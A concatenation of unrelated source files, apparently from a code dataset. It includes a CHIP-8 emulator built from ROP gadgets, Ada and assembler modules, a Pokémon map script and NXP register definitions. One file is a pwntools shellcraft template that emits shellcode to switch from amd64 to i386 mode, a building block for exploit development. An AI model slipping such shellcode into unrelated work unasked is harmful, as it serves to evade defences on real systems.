length H_ROWS DC CL09'zFAM-Rows' HTTP Header DS 0F ********************************************************************* * Trace resources * *********************************************************************** T_46 DC H'46' Trace number T_46_M DC CL08'Build RA' Trace message T_RES DC CL08'zFAM020 ' Trace resource T_LEN DC H'08' Trace resource length * *********************************************************************** * Media type resources * ********************************************************************* DS 0H M_PLAIN DC CL10'TEXT/PLAIN' Equates to FORMAT=FIXED M_JSON DC CL09'TEXT/JSON' Equates to FORMAT=JSON M_XML DC CL08'TEXT/XML' Equates to FORMAT=XML M_DELIM DC CL14'TEXT/DELIMITED' Equates to FORMAT=DELIMITED DS 0H A_JSON DC CL16'APPLICATION/JSON' Equates to FORMAT=JSON A_XML DC CL15'APPLICATION/XML' Equates to FORMAT=XML ********************************************************************* * JSON characters. * *********************************************************************** DS 0H T_JSON DC XL01'BB' JSON trailer T_JSON_L EQU -T_JSON JSON trailer length DS 0H H_XML DC CL16'<zFAM_ResultsArr' XML header DC CL03'ay>' H_XML_L EQU -H_XML XML header length DS 0H T_XML DC CL16'</zFAM_ResultsAr' XML trailer DC CL04'ray>' T_XML_L EQU -T_XML XML trailer length DS 0H L_SQUIG DC CL01'{' Left squiggle bracket R_SQUIG DC CL01'}' Right squiggle bracket L_SQUARE DC XL01'BA' Left square bracket R_SQUARE DC XL01'BB' Right square bracket A_COMMA DC CL01',' A comma D_QUOTE DC CL01'"' Double quote *********************************************************************** * Literal Pool * *********************************************************************** LTORG * * *********************************************************************** * Register assignment * *********************************************************************** DS 0F R0 EQU 0 R1 EQU 1 R2 EQU 2 R3 EQU 3 R4 EQU 4 R5 EQU 5 R6 EQU 6 R7 EQU 7 R8 EQU 8 R9 EQU 9 R10 EQU 10 R11 EQU 11 R12 EQU 12 R13 EQU 13 R14 EQU 14 R15 EQU 15 * PRINT ON *********************************************************************** * End of Program - ZFAM020 * ********************************************************************** END ZFAM020
opcodes.asm	DavidBuchanan314/CHIP8-ROP	1	11725	BITS 64 extern puts extern exit extern vram extern V extern DT global emu_entry global op_debug global op_nop global op_ret global op_jp global op_call global op_se_imm global op_sne_imm global op_se global op_ld_imm global op_add_imm global op_ld global op_or global op_and global op_xor global op_add global op_ld_i global op_drw global op_unld_dt global op_ld_dt global op_add_i global op_ld_regs section .data section .bss stack: resq 16 section .text align 4 emu_entry: add rsp, 8 xor rdi, rdi; I register xor r11, r11; SP register ret align 4 op_debug: ; not a real op, used for debugging pop rdi call puts mov rdi, -1 call exit align 4 op_nop: ; also not a real op add rsp, 8 ret align 4 op_ret: dec r11 mov rsp, [stack+r118] ret align 4 op_jp: pop rsp ret align 4 op_call: pop rax mov [stack+r118], rsp inc r11 mov rsp, rax ret align 4 op_se_imm: pop rax movzx ecx, ah cmp [V+ecx], al jne .cont add rsp, 16 .cont ret align 4 op_sne_imm: pop rax movzx ecx, ah cmp [V+ecx], al je .cont add rsp, 16 .cont ret align 4 op_se: pop rax xor rbx, rbx mov bl, ah mov cl, [V+rbx] mov bl, al mov al, [V+rbx] cmp cl, al jne .cont add rsp, 16 .cont ret align 4 op_ld_imm: pop rax movzx ecx, ah mov [V+ecx], al ret align 4 op_add_imm: pop rax movzx ecx, ah add [V+ecx], al ret align 4 op_or: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah or [V+ecx], al ret align 4 op_and: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah and [V+ecx], al ret align 4 op_xor: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah xor [V+ecx], al ret align 4 op_add: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah add [V+ecx], al ret align 4 op_ld: pop rax movzx ecx, al mov al, [V+ecx] movzx ecx, ah mov [V+ecx], al ret align 4 op_ld_i: pop rdi ret align 4 op_drw: pop rax movzx ecx, ah mov cl, [V+ecx] add cl, 8 mov dl, al xor rbx, rbx mov bl, al shr bl, 4 mov bl, [V+rbx] mov byte [V+0xF], 0 mov rsi, rdi .loop and dl, 0xF jz .done and rbx, 31 xor rax, rax mov al, [rsi] ror rax, cl mov r8, rax and r8, [vram+rbx8] jz .nocol mov byte [V+0xF], 1 .nocol xor [vram+rbx8], rax inc rbx inc rsi dec dl jmp .loop .done ret align 4 op_unld_dt: pop rax mov dl, [DT] mov [rax], dl ret align 4 op_ld_dt: pop rax mov al, [rax] mov [DT], al ret align 4 op_add_i: pop rax xor rbx, rbx mov bl, byte [rax] add rdi, rbx ret align 4 op_ld_regs: pop rax .loop mov bl, [rdi+rax] mov [V+rax], bl dec rax jns .loop ret
pwnlib/shellcraft/templates/amd64/linux/amd64_to_i386.asm	tkmikan/pwntools	8,966	161288	<% from pwnlib.shellcraft import common %> <%docstring>Returns code to switch from amd64 to i386 mode. Note that you most surely want to set up some stack (and place this code) in low address space before (or afterwards).</%docstring> .code64 call $+4 .byte 0xc0 /* inc eax / mov byte ptr [rsp+4], 0x23 / This is the segment we want to go to */ retfd .code32
source/serialization.ads	ytomino/yaml-ada	4	7055	<reponame>ytomino/yaml-ada with Ada.Containers; with Ada.Iterator_Interfaces; with Ada.Strings.Unbounded; package Serialization is pragma Preelaborate; type Stream_Element_Kind is ( Value, Enter_Mapping, Leave_Mapping, Enter_Sequence, Leave_Sequence, End_Of_Stream); type Direction is (Reading, Writing); type Serializer (Direction : Serialization.Direction) is limited private; -- scalar procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Ada.Strings.Unbounded.Unbounded_String); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Ada.Strings.Unbounded.Unbounded_String; Default : in Ada.Strings.Unbounded.Unbounded_String); procedure IO ( Object : not null access Serializer; Value : in out Ada.Strings.Unbounded.Unbounded_String); procedure IO ( Object : not null access Serializer; Value : in out Ada.Strings.Unbounded.Unbounded_String; Default : in Ada.Strings.Unbounded.Unbounded_String); generic type Custom_Type is private; with function Image (S : Custom_Type) return String; with function Value (S : String) return Custom_Type; Triming : in Boolean := False; package IO_Custom is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Custom_Type); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Custom_Type; Default : in Custom_Type); end IO_Custom; generic type Enumeration_Type is (<>); package IO_Enumeration is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type; Default : in Enumeration_Type); private package Enum_IO is new IO_Custom ( Enumeration_Type, Enumeration_Type'Image, Enumeration_Type'Value, Triming => True); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type) renames Enum_IO.IO; procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Enumeration_Type; Default : in Enumeration_Type) renames Enum_IO.IO; end IO_Enumeration; procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Integer); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Integer; Default : in Integer); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Boolean); procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Boolean; Default : in Boolean); -- mapping procedure IO ( Object : not null access Serializer; Name : in String; Callback : not null access procedure); procedure IO ( Object : not null access Serializer; Callback : not null access procedure); type Cursor is private; function Has_Element (Position : Cursor) return Boolean; package Mapping_Iterator_Interfaces is new Ada.Iterator_Interfaces (Cursor, Has_Element); function IO (Object : not null access Serializer; Name : String) return Mapping_Iterator_Interfaces.Forward_Iterator'Class; function IO (Object : not null access Serializer) return Mapping_Iterator_Interfaces.Forward_Iterator'Class; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; Default : in Element_Type; with procedure Iterate ( Container : in Container_Type; Process : not null access procedure (Position : in Cursor)) is <>; with procedure Update_Element ( Container : in out Container_Type; Position : in Cursor; Process : not null access procedure ( Key : in String; Element : in out Element_Type)) is <>; with procedure Insert ( Container : in out Container_Type; Key : in String; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Map_2005 is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); end IO_Map_2005; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; type Reference_Type ( Element : not null access Element_Type) is limited private; Default : in Element_Type; with function Has_Element (Position : Cursor) return Boolean is <>; with function First (Container : Container_Type) return Cursor is <>; with function Next (Position : Cursor) return Cursor is <>; with function Key (Position : Cursor) return String is <>; with function Reference ( Container : aliased in out Container_Type; Position : Cursor) return Reference_Type is <>; with procedure Insert ( Container : in out Container_Type; Key : in String; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Map_2012 is procedure IO ( Object : not null access Serializer; Name : in String; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Name : in String; Item : in out Element_Type)); end IO_Map_2012; generic package IO_Map renames IO_Map_2012; -- sequence generic type Index_Type is (<>); type Element_Type is private; type Array_Type is array (Index_Type range <>) of Element_Type; type Array_Access is access Array_Type; Default : in Element_Type; with procedure Free (X : in out Array_Access) is <>; package IO_Array is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Array_Access; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Array_Access; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_Array; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; Default : in Element_Type; with function Last (Container : Container_Type) return Cursor is <>; with procedure Iterate ( Container : in Container_Type; Process : not null access procedure (Position : in Cursor)) is <>; with procedure Update_Element ( Container : in out Container_Type; Position : in Cursor; Process : not null access procedure (Element : in out Element_Type)) is <>; with procedure Append ( Container : in out Container_Type; New_Item : in Element_Type; Count : in Ada.Containers.Count_Type := 1) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_List_2005 is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_List_2005; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; type Reference_Type ( Element : not null access Element_Type) is limited private; Default : in Element_Type; with function Last (Container : Container_Type) return Cursor is <>; with function Has_Element (Position : Cursor) return Boolean is <>; with function First (Container : Container_Type) return Cursor is <>; with function Next (Position : Cursor) return Cursor is <>; with function Reference ( Container : aliased in out Container_Type; Position : Cursor) return Reference_Type is <>; with procedure Append ( Container : in out Container_Type; New_Item : in Element_Type; Count : in Ada.Containers.Count_Type := 1) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_List_2012 is procedure IO ( Object : not null access Serializer; Name : in String; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_List_2012; generic package IO_List renames IO_List_2012; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; Default : in Element_Type; with procedure Iterate ( Container : in Container_Type; Process : not null access procedure (Position : in Cursor)) is <>; with procedure Query_Element ( Position : in Cursor; Process : not null access procedure (Element : in Element_Type)) is <>; with procedure Insert ( Container : in out Container_Type; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Set_2005 is procedure IO ( Object : not null access Serializer; Name : in String; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_Set_2005; generic type Cursor is private; type Element_Type is private; type Container_Type is limited private; type Constant_Reference_Type ( Element : not null access constant Element_Type) is limited private; Default : in Element_Type; with function Has_Element (Position : Cursor) return Boolean is <>; with function First (Container : Container_Type) return Cursor is <>; with function Next (Position : Cursor) return Cursor is <>; with function Constant_Reference ( Container : aliased Container_Type; Position : Cursor) return Constant_Reference_Type is <>; with procedure Insert ( Container : in out Container_Type; New_Item : in Element_Type; Position : out Cursor; Inserted : out Boolean) is <>; with procedure Clear (Container : in out Container_Type) is <>; package IO_Set_2012 is procedure IO ( Object : not null access Serializer; Name : in String; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); procedure IO ( Object : not null access Serializer; Value : aliased in out Container_Type; Callback : not null access procedure ( Object : not null access Serializer; Item : in out Element_Type)); end IO_Set_2012; generic package IO_Set renames IO_Set_2012; private type State is (In_Mapping, In_Sequence); pragma Discard_Names (State); type Reader is abstract tagged limited null record; function Next_Kind (Object : not null access Reader) return Stream_Element_Kind is abstract; function Next_Name (Object : not null access Reader) return not null access constant String is abstract; function Next_Value (Object : not null access Reader) return not null access constant String is abstract; procedure Advance ( Object : not null access Reader; Position : in State) is abstract; procedure Advance_Structure ( Object : not null access Reader; Position : in State); type Writer is abstract tagged limited null record; procedure Put ( Object : not null access Writer; Name : in String; Item : in String) is abstract; procedure Enter_Mapping ( Object : not null access Writer; Name : in String) is abstract; procedure Leave_Mapping (Object : not null access Writer) is abstract; procedure Enter_Sequence ( Object : not null access Writer; Name : in String) is abstract; procedure Leave_Sequence (Object : not null access Writer) is abstract; type Serializer (Direction : Serialization.Direction) is limited record case Direction is when Reading => Reader : not null access Serialization.Reader'Class; when Writing => Writer : not null access Serialization.Writer'Class; end case; end record; -- mapping type Cursor is new Boolean; type Mapping_Iterator is new Mapping_Iterator_Interfaces.Forward_Iterator with record Serializer : not null access Serialization.Serializer; Entry_Presence : Boolean; end record; overriding function First (Object : Mapping_Iterator) return Cursor; overriding function Next (Object : Mapping_Iterator; Position : Cursor) return Cursor; end Serialization;
library/fmGUI_ManageDatabase/fmGUI_ManageDb_FieldsPickTable.applescript	NYHTC/applescript-fm-helper	1	3790	-- fmGUI_ManageDb_FieldsPickTable(baseTableName) -- <NAME>, NYHTC -- select the specified ( if not already selected ) base table on the Fields tab of Manage Database. (* HISTORY: 1.4.1 - 2017-09-06 ( eshagdar ): updated error message. updated call to pop up set. 1.4 - 2016-10-28 ( eshagdar ): ensure app is frontmost 1.3 - 1.2 - 1.1 - 1.0 - created REQUIRES: fmGUI_AppFrontMost fmGUI_ManageDb_GoToTab_Fields fmGUI_PopupSet *) on run fmGUI_ManageDb_FieldsPickTable("ZZ_GLOBALS") end run -------------------- -- START OF CODE -------------------- on fmGUI_ManageDb_FieldsPickTable(baseTableName) -- version 1.4.1 try fmGUI_AppFrontMost() fmGUI_ManageDb_GoToTab_Fields({}) tell application "System Events" tell application process "FileMaker Pro Advanced" set tablePopUpButton to pop up button "Table:" of tab group 1 of window 1 end tell end tell fmGUI_PopupSet({objRef:tablePopUpButton, objValue:baseTableName}) return true on error errMsg number errNum error "unable to fmGUI_ManageDb_FieldsPickTable ( couldn't select table '" & baseTableName & "' ) - " & errMsg number errNum end try end fmGUI_ManageDb_FieldsPickTable -------------------- -- END OF CODE -------------------- on fmGUI_AppFrontMost() tell application "htcLib" to fmGUI_AppFrontMost() end fmGUI_AppFrontMost on fmGUI_ManageDb_GoToTab_Fields(prefs) tell application "htcLib" to fmGUI_ManageDb_GoToTab_Fields(prefs) end fmGUI_ManageDb_GoToTab_Fields on fmGUI_PopupSet(prefs) set objRefStr to coerceToString(objRef of prefs) tell application "htcLib" to fmGUI_PopupSet({objRef:objRefStr} & prefs) end fmGUI_PopupSet on coerceToString(incomingObject) -- 2017-07-12 ( eshagdar ): bootstrap code to bring a coerceToString into this file for the sample to run ( instead of having a copy of the handler locally ). tell application "Finder" to set coercePath to (container of (container of (path to me)) as text) & "text parsing:coerceToString.applescript" set codeCoerce to read file coercePath as text tell application "htcLib" to set codeCoerce to "script codeCoerce " & return & getTextBetween({sourceTEXT:codeCoerce, beforeText:"-- START OF CODE", afterText:"-- END OF CODE"}) & return & "end script" & return & "return codeCoerce" set codeCoerce to run script codeCoerce tell codeCoerce to coerceToString(incomingObject) end coerceToString
libraries/mmlibc/amd64/src/tls.asm	betopp/pathetix	0	13249	;tls.asm ;TLS getter for MuKe's libc on AMD64 ;<NAME> <<EMAIL>> 2021 section .text bits 64 align 16 global _tls ;_tls_t *_tls() _tls: rdgsbase RAX ret
maps/Route204S.asm	AtmaBuster/pokeplat-gen2	6	246191	<filename>maps/Route204S.asm object_const_def ; object_event constants Route204S_MapScripts: db 0 ; scene scripts db 0 ; callbacks TrainerLassSarah: trainer LASS, SARAH, EVENT_BEAT_LASS_SARAH, .SeenText, .BeatenText, 0, .Script .Script: endifjustbattled opentext writetext .AfterText waitbutton closetext end .SeenText: text "Oh, a weak-looking" line "TRAINER…" para "Do you want to" line "have a go?" done .BeatenText: text "Aww… I should have" line "said no." done .AfterText: text "Oh, you're so mean!" para "I just started" line "training #MON!" done TrainerYoungsterTyler: trainer YOUNGSTER, TYLER, EVENT_BEAT_YOUNGSTER_TYLER, .SeenText, .BeatenText, 0, .Script .Script: endifjustbattled opentext writetext .AfterText waitbutton closetext end .SeenText: text "I'll beat you with" line "the MAGIKARP my" cont "dad gave me!" done .BeatenText: text "But they're the" line "#MON I got from" cont "my dad…" done .AfterText: text "Who gave you your" line "first #MON?" para "Your first #MON" line "is the one with" cont "the most fond" cont "memories, I think." done TrainerLassSamantha: trainer LASS, SAMANTHA1, EVENT_BEAT_LASS_SAMANTHA1, .SeenText, .BeatenText, 0, .Script .Script: endifjustbattled opentext writetext .AfterText waitbutton closetext end .SeenText: text "May I please" line "trouble you for a" cont "battle?" done .BeatenText: text "Oh…" line "You're so strong…" done .AfterText: text "Maybe I could have" line "won if my #MON" cont "held a BERRY…" done Route204_JubilifeSignScript: jumptextsign .Text .Text: text "<SIGN\|> ROUTE 204" line "<SIGND> JUBILIFE CITY" done Route204_RavagedPathSignScript: jumptext .Text .Text: text "RAVAGED PATH" done Route204_BoulderKidScript: jumptextfaceplayer .Text .Text: text "There are boulders" line "blocking the way" cont "inside the cavern…" para "I think a #MON's" line "hidden move will" cont "be able to smash" cont "those boulders," cont "though." done Route204_ParlyzHealScript: itemball PARLYZ_HEAL Route204_HPUpScript: itemball HP_UP Route204_SeaIncenseScript: itemball SEA_INCENSE Route204S_MapEvents: db 0, 0 ; filler db 1 ; warp events warp_event 6, 21, RAVAGED_PATH, 1 db 0 ; coord events db 2 ; bg events bg_event 10, 28, BGEVENT_READ, Route204_JubilifeSignScript bg_event 7, 22, BGEVENT_READ, Route204_RavagedPathSignScript db 8 ; object events object_event 8, 32, SPRITE_LASS, SPRITEMOVEDATA_TURN_UP_RIGHT, 0, 0, -1, -1, 0, OBJECTTYPE_TRAINER, 3, TrainerLassSarah, -1 object_event 4, 30, SPRITE_YOUNGSTER, SPRITEMOVEDATA_TURN_LEFT_RIGHT, 0, 0, -1, -1, 0, OBJECTTYPE_TRAINER, 1, TrainerYoungsterTyler, -1 object_event 7, 25, SPRITE_LASS, SPRITEMOVEDATA_STANDING_DOWN, 0, 0, -1, -1, 0, OBJECTTYPE_TRAINER, 3, TrainerLassSamantha, -1 object_event 8, 23, SPRITE_YOUNGSTER, SPRITEMOVEDATA_WALK_LEFT_RIGHT, 1, 0, -1, -1, 0, OBJECTTYPE_SCRIPT, 0, Route204_BoulderKidScript, -1 object_event 9, 18, SPRITE_YOUNGSTER, SPRITEMOVEDATA_WALK_LEFT_RIGHT, 1, 0, -1, -1, 0, OBJECTTYPE_SCRIPT, 0, ObjectEvent, -1 object_event 13, 31, SPRITE_POKE_BALL, SPRITEMOVEDATA_STILL, 0, 0, -1, -1, 0, OBJECTTYPE_ITEMBALL, 0, Route204_ParlyzHealScript, EVENT_ROUTE_204_PARLYZ_HEAL object_event 22, 25, SPRITE_POKE_BALL, SPRITEMOVEDATA_STILL, 0, 0, -1, -1, 0, OBJECTTYPE_ITEMBALL, 0, Route204_HPUpScript, EVENT_ROUTE_204_HP_UP object_event 0, 38, SPRITE_POKE_BALL, SPRITEMOVEDATA_STILL, 0, 0, -1, -1, 0, OBJECTTYPE_ITEMBALL, 0, Route204_SeaIncenseScript, EVENT_ROUTE_204_SEA_INCENSE
alloy4fun_models/trashltl/models/19/7wPGJcy4faJmqDuGh.als	Kaixi26/org.alloytools.alloy	0	2331	<reponame>Kaixi26/org.alloytools.alloy open main pred id7wPGJcy4faJmqDuGh_prop20 { always all f : Trash \| f in Trash since f in Protected } pred __repair { id7wPGJcy4faJmqDuGh_prop20 } check __repair { id7wPGJcy4faJmqDuGh_prop20 <=> prop20o }
iod/nul/open.asm	olifink/smsqe	0	80259	; Open NUL Channel V2.00 1989 <NAME> section nul xdef nul_open xdef nul_name xdef nul_parm include 'dev8_keys_qlv' include 'dev8_keys_err' include 'dev8_iod_nul_data' include 'dev8_mac_assert' ;+++ ; NUL channel open operations. (Using IOU.DNAM) ;--- nul_open frame equ $4 subq.l #frame,sp ; make room for the parameters move.l a3,a4 ; save pointer to def block move.l sp,a3 ; set pointer to parameters move.w iou.dnam,a2 ; read name jsr (a2) bra.s nulo_exit bra.s nulo_exit bra.s nulo_setup dc.w 3 nul_name dc.w 'NUL' dc.w 1 dc.w 4 nul_parm dc.w 'FZLP' nulo_setup moveq #nlc_end,d1 move.w mem.achp,a2 ; allocate in heap jsr (a2) bne.s nulo_exit ; ... oops move.w (sp),d1 ; parameter move.w d1,nlc_parm(a0) ; save it add.w d1,d1 move.w nul_key(pc,d1.w),nlc_key(a0) ; set key nulo_exit addq.l #frame,sp rts nul_key dc.w nlc.bp,nlc.file,nlc.zero,nlc.line,nlc.paus end
src/gen-model.ads	Letractively/ada-gen	0	5145	----------------------------------------------------------------------- -- gen-model -- Model for Code Generator -- Copyright (C) 2009, 2010, 2011, 2012 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- with Ada.Finalization; with Ada.Strings.Unbounded; with Util.Beans.Basic; with Util.Beans.Objects; with Util.Beans.Objects.Maps; with DOM.Core; package Gen.Model is -- Exception raised if a name is already registered in the model. -- This exception is raised if a table, an enum is already defined. Name_Exist : exception; -- ------------------------------ -- Model Definition -- ------------------------------ type Definition is new Ada.Finalization.Limited_Controlled and Util.Beans.Basic.Readonly_Bean with record Row_Index : Natural; Name : Ada.Strings.Unbounded.Unbounded_String; Attrs : Util.Beans.Objects.Maps.Map_Bean; Comment : Util.Beans.Objects.Object; end record; type Definition_Access is access all Definition'Class; -- Prepare the generation of the model. procedure Prepare (O : in out Definition) is null; -- Get the object unique name. function Get_Name (From : in Definition) return String; -- Get the value identified by the name. -- If the name cannot be found, the method should return the Null object. function Get_Value (From : in Definition; Name : in String) return Util.Beans.Objects.Object; -- Get the value identified by the name. -- If the name cannot be found, the method should return the Null object. function Get_Attribute (From : in Definition; Name : in String) return String; -- Get the value identified by the name. -- If the name cannot be found, the method should return the Null object. function Get_Attribute (From : in Definition; Name : in String) return Ada.Strings.Unbounded.Unbounded_String; -- Set the comment associated with the element. procedure Set_Comment (Def : in out Definition; Comment : in String); -- Initialize the definition from the DOM node attributes. procedure Initialize (Def : in out Definition; Name : in Ada.Strings.Unbounded.Unbounded_String; Node : in DOM.Core.Node); end Gen.Model;
arch/ARM/NXP/svd/lpc55s6x/nxp_svd-plu.ads	morbos/Ada_Drivers_Library	2	21111	<gh_stars>1-10 -- Copyright 2016-2019 NXP -- All rights reserved.SPDX-License-Identifier: BSD-3-Clause -- This spec has been automatically generated from LPC55S6x.svd pragma Restrictions (No_Elaboration_Code); pragma Ada_2012; pragma Style_Checks (Off); with HAL; with System; package NXP_SVD.PLU is pragma Preelaborate; --------------- -- Registers -- --------------- ----------------------------- -- LUT cluster's Registers -- ----------------------------- -- Selects the input source to be connected to LUT0 input0. For each LUT, -- the slot associated with the output from LUTn itself is tied low. type LUT_INP_MUX_LUTn_INPx_Field is ( -- The PLU primary inputs 0. PLU_INPUTS0, -- The PLU primary inputs 1. PLU_INPUTS1, -- The PLU primary inputs 2. PLU_INPUTS2, -- The PLU primary inputs 3. PLU_INPUTS3, -- The PLU primary inputs 4. PLU_INPUTS4, -- The PLU primary inputs 5. PLU_INPUTS5, -- The output of LUT0. LUT_OUTPUTS0, -- The output of LUT1. LUT_OUTPUTS1, -- The output of LUT2. LUT_OUTPUTS2, -- The output of LUT3. LUT_OUTPUTS3, -- The output of LUT4. LUT_OUTPUTS4, -- The output of LUT5. LUT_OUTPUTS5, -- The output of LUT6. LUT_OUTPUTS6, -- The output of LUT7. LUT_OUTPUTS7, -- The output of LUT8. LUT_OUTPUTS8, -- The output of LUT9. LUT_OUTPUTS9, -- The output of LUT10. LUT_OUTPUTS10, -- The output of LUT11. LUT_OUTPUTS11, -- The output of LUT12. LUT_OUTPUTS12, -- The output of LUT13. LUT_OUTPUTS13, -- The output of LUT14. LUT_OUTPUTS14, -- The output of LUT15. LUT_OUTPUTS15, -- The output of LUT16. LUT_OUTPUTS16, -- The output of LUT17. LUT_OUTPUTS17, -- The output of LUT18. LUT_OUTPUTS18, -- The output of LUT19. LUT_OUTPUTS19, -- The output of LUT20. LUT_OUTPUTS20, -- The output of LUT21. LUT_OUTPUTS21, -- The output of LUT22. LUT_OUTPUTS22, -- The output of LUT23. LUT_OUTPUTS23, -- The output of LUT24. LUT_OUTPUTS24, -- The output of LUT25. LUT_OUTPUTS25, -- state(0). STATE0, -- state(1). STATE1, -- state(2). STATE2, -- state(3). STATE3) with Size => 6; for LUT_INP_MUX_LUTn_INPx_Field use (PLU_INPUTS0 => 0, PLU_INPUTS1 => 1, PLU_INPUTS2 => 2, PLU_INPUTS3 => 3, PLU_INPUTS4 => 4, PLU_INPUTS5 => 5, LUT_OUTPUTS0 => 6, LUT_OUTPUTS1 => 7, LUT_OUTPUTS2 => 8, LUT_OUTPUTS3 => 9, LUT_OUTPUTS4 => 10, LUT_OUTPUTS5 => 11, LUT_OUTPUTS6 => 12, LUT_OUTPUTS7 => 13, LUT_OUTPUTS8 => 14, LUT_OUTPUTS9 => 15, LUT_OUTPUTS10 => 16, LUT_OUTPUTS11 => 17, LUT_OUTPUTS12 => 18, LUT_OUTPUTS13 => 19, LUT_OUTPUTS14 => 20, LUT_OUTPUTS15 => 21, LUT_OUTPUTS16 => 22, LUT_OUTPUTS17 => 23, LUT_OUTPUTS18 => 24, LUT_OUTPUTS19 => 25, LUT_OUTPUTS20 => 26, LUT_OUTPUTS21 => 27, LUT_OUTPUTS22 => 28, LUT_OUTPUTS23 => 29, LUT_OUTPUTS24 => 30, LUT_OUTPUTS25 => 31, STATE0 => 32, STATE1 => 33, STATE2 => 34, STATE3 => 35); -- LUTn input x MUX type LUT_INP_MUX_LUT_Register is record -- Selects the input source to be connected to LUT0 input0. For each -- LUT, the slot associated with the output from LUTn itself is tied -- low. LUTn_INPx : LUT_INP_MUX_LUTn_INPx_Field := NXP_SVD.PLU.PLU_INPUTS0; -- unspecified Reserved_6_31 : HAL.UInt26 := 16#0#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for LUT_INP_MUX_LUT_Register use record LUTn_INPx at 0 range 0 .. 5; Reserved_6_31 at 0 range 6 .. 31; end record; -- LUTn input x MUX type LUT_INP_MUX_LUT_Registers is array (0 .. 4) of LUT_INP_MUX_LUT_Register with Volatile; -- no description available type LUT_Cluster is record -- LUTn input x MUX LUT_INP_MUX : aliased LUT_INP_MUX_LUT_Registers; end record with Volatile, Size => 256; for LUT_Cluster use record LUT_INP_MUX at 0 range 0 .. 159; end record; -- no description available type LUT_Clusters is array (0 .. 25) of LUT_Cluster; -- Specifies the Truth Table contents for LUT0 -- Specifies the Truth Table contents for LUT0 type LUT_TRUTH_Registers is array (0 .. 25) of HAL.UInt32 with Volatile; subtype OUTPUTS_OUTPUT_STATE_Field is HAL.UInt8; -- Provides the current state of the 8 designated PLU Outputs. type OUTPUTS_Register is record -- Read-only. Provides the current state of the 8 designated PLU -- Outputs.. OUTPUT_STATE : OUTPUTS_OUTPUT_STATE_Field; -- unspecified Reserved_8_31 : HAL.UInt24; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for OUTPUTS_Register use record OUTPUT_STATE at 0 range 0 .. 7; Reserved_8_31 at 0 range 8 .. 31; end record; subtype WAKEINT_CTRL_MASK_Field is HAL.UInt8; -- control input of the PLU, add filtering for glitch. type WAKEINT_CTRL_FILTER_MODE_Field is ( -- Bypass mode. Bypass, -- Filter 1 clock period. Filter1Clk, -- Filter 2 clock period. Filter2Clk, -- Filter 3 clock period. Filter3Clk) with Size => 2; for WAKEINT_CTRL_FILTER_MODE_Field use (Bypass => 0, Filter1Clk => 1, Filter2Clk => 2, Filter3Clk => 3); -- hclk is divided by 2filter_clksel. type WAKEINT_CTRL_FILTER_CLKSEL_Field is ( -- Selects the 1 MHz low-power oscillator as the filter clock. Fro1Mhz, -- Selects the 12 Mhz FRO as the filter clock. Fro12Mhz, -- Selects a third filter clock source, if provided. Other_Clock) with Size => 2; for 